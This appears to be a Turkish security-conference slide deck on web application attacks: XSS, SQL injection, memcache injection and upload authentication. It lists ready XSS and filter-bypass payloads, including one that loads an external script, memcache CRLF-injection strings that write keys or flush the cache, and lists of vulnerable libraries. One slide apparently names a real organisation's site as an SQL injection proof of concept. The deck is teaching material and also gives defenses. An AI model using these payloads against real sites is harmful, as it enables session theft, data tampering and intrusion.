Web Uygulama GüvenliğiAkademik Bilişim 2016

Ömer Çıtak

#! whoami

Full-Stack Developer @ Cydets Inc.

development && security

www.omercitak.com

Social : @Om3rCitak

#! cat index• Cross-site Scripting (XSS)

• SQL Injection

• Memcache Injection

• Upload Authentication

#! ping-pong.jpg

#! dont-trust-anyone.jpg

#! cross-site-scripting• Reflected XSS• DOM Based XSS• Stored XSS

#! reflected-xss.jpg

#! reflected-xss-poc.jpg

#! dom-based-xss.jpg

#! stored-xss.jpg

#! stored-xss-poc.jpg

#! stored-xss-poc.jpg

#! cat classic-xss-payloads• <script>alert(1)</script>• <img src="javascript:alert('XSS');">• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>• <SCRIPT a=">"

SRC="http://omercitak.com/xss.js"></SCRIPT>• <video src=1 onerror=alert(1)>• <audio src=1 onerror=alert(1)>• <img src=x onerror=alert(1)">

#! cat xss-bypass-payloads

• <scrscriptipt>alalertert(1)</scrscriptipt>• alert(String.fromCharCode(88,83,83))• <IMG

SRC=&#106;&#97…………….&#39;&#41;>• <IMG SRC='vbscript:msgbox("XSS")'>

#! xss-protection-1.jpg• Strip Tags

– http://php.net/manual/tr/function.strip-tags.php

#! xss-protection-2.jpg• HTML Special Chars

– http://php.net/manual/tr/function.htmlspecialchars.php

#! xss-protection-3.jpg• HttpOnly Cookies (session_set_cookie_params)

#! xss-protection-4.jpg

#! xss-protection-4.jpg

#! xss-demo.jpg

#! sql-injection• Union Based SQL Injection• Blind SQL Injection• Time Based SQL Injection

#! union-based-sql-injection.jpg

#! sql-injection-login-bypass.jpg

#! cat blind-sql-injection

• Ya hatalar gizlenmiş ise? (error_reporting(0))

• Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?

#! blind-sql-injection.jpg

Reis Yaradanöbür tarafta

sormayacak mı reisneden Blind Injection

denemedin diye?

#! blind-sql-injection.jpg

#! blind-sql-injection-poc.jpg

#! blind-sql-injection-poc.jpg

#! cat time-based-sql-injection• Ya arka planda çıktı vermeyen bir query çalışıyor

ise?– Count Query– Update Query– Insert Query– Delete Query– Relationship Query

#! time-based-sql-injection.jpg

#! time-based-sql-injection.jpgMySQL Server

Microsoft SQL Server

Oracle Server

#! sql-injection-poc.jpgUluslararası Af Örgütü (amnesty.org.tr)

#! sql-injection-poc.jpg

#! sql-injection-demo.jpg

#! memcache-injection

#! using-memcache.jpg

#! phpstorm memcached.php

#! telnet 127.0.0.1 11211> set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END

#! phpstorm memcached.php

#! phpstorm memcached.php

#! phpstorm memcached.php

#! phpstorm memcached.php

#! phpstorm memcached.php?key=omer 0 10 6 \r\n hacked \r\n

• urlencode(‘\r’) = %0d • urlencode(‘\n’) = %0a

?key=omer 0 10 6 %0d%0a hacked %0d%0a

#! phpstorm memcached.php

> set omer 0 3600 6 > hacked < STORED > 123456 < ERROR

#! phpstorm memcached.php?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a

?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a

?key=aaaaa…(251) flush_all %0d%0a

#! cat vulnerable-libraries

Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached

#! cat safe_libraries

Python : python-memcache Php : memcache Java : java.net.spy.memcached

#! cat using-memcached-library

Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3

#! ascii-table.jpg

#! phpstorm memcached.php

#! upload-authentication

#! upload-authentication-poc

#! wget questions

#! exit

Thanks <3

www.omercitak.com

Social : @Om3rCitak